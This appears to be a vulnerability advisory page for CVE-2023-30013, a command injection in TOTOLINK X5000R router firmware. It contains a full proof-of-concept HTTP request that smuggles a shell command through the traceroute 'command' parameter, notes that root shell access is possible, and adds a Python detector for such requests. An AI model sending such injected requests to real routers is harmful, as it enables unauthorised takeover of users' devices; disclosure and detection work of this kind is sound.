Headline
CVE-2023-30013: vuln/TOTOLINK/X5000R/2 at main · Kazamayc/vuln
TOTOLINK X5000R V9.1.0u.6118_B20201102 and V9.1.0u.6369_B20230113 contain a command insertion vulnerability in setting/setTracerouteCfg. This vulnerability allows an attacker to execute arbitrary commands through the “command” parameter.
TOTOLINK X5000R (V9.1.0u.6369_B20230113) was found to contain a command insertion vulnerability in setting/setTracerouteCfg. This vulnerability allows an attacker to execute arbitrary commands through the “command” parameter.
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.3.2
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 82
Origin: http://192.168.3.2
Connection: close
Referer: http://192.168.3.2/advance/traceroute.html?time=1679125513355
Cookie: SESSION_ID=2:1679122532:2

{"command":"127.0.0.1; pwd > /tmp/1.txt;","num":"4","topicurl":"setTracerouteCfg"}
Finally, you can write an exploit to get a stable root shell without authorization.
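A defensive check for the request above, as an added example that is not part of the original advisory or the vendor's code: it classifies POST bodies sent to /cgi-bin/cstecgi.cgi and flags any setTracerouteCfg call whose "command" value is not a plain IP address or hostname. The function names and sample bodies are constructed for illustration, and treating a bare IP or hostname as the only legitimate traceroute target is an assumption.

```python
import ipaddress
import json
import re

# RFC 1123 hostname: dot-separated labels of letters, digits and hyphens.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
_HOSTNAME = re.compile(rf"{_LABEL}(?:\.{_LABEL})*")


def is_valid_target(value):
    """True only if value is a plain IP address or hostname (assumed allowlist)."""
    if not isinstance(value, str) or not 0 < len(value) <= 253:
        return False
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        # fullmatch rejects trailing newlines, spaces and shell metacharacters.
        return _HOSTNAME.fullmatch(value) is not None


def inspect_body(body):
    """Classify one POST body sent to /cgi-bin/cstecgi.cgi.

    Returns "ignore" (not a setTracerouteCfg call), "ok" (target is a
    plain host) or "alert" (target is missing or carries anything else).
    """
    try:
        msg = json.loads(body)
    except (ValueError, TypeError):
        return "ignore"
    if not isinstance(msg, dict) or msg.get("topicurl") != "setTracerouteCfg":
        return "ignore"
    return "ok" if is_valid_target(msg.get("command")) else "alert"


# Constructed sample bodies; the second is the request body shown above.
SAMPLES = [
    '{"command":"192.168.3.1","num":"4","topicurl":"setTracerouteCfg"}',
    '{"command":"127.0.0.1; pwd > /tmp/1.txt;","num":"4","topicurl":"setTracerouteCfg"}',
    '{"command":"example.com\\n","num":"4","topicurl":"setTracerouteCfg"}',
    '{"topicurl":"otherTopic"}',
]

if __name__ == "__main__":
    for body in SAMPLES:
        print(inspect_body(body), body)
```

The same allowlist is what an input check in front of the traceroute handler would enforce; as a log or proxy rule it only reports, so an "alert" result still needs the firmware fix or an access restriction behind it.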
Related news
Multiple TOTOLINK network products contain a command injection vulnerability in setting/setTracerouteCfg. This vulnerability allows an attacker to execute arbitrary commands through the command parameter. After exploitation, an attacker will have full access with the same user privileges under which the webserver is running - which is typically root.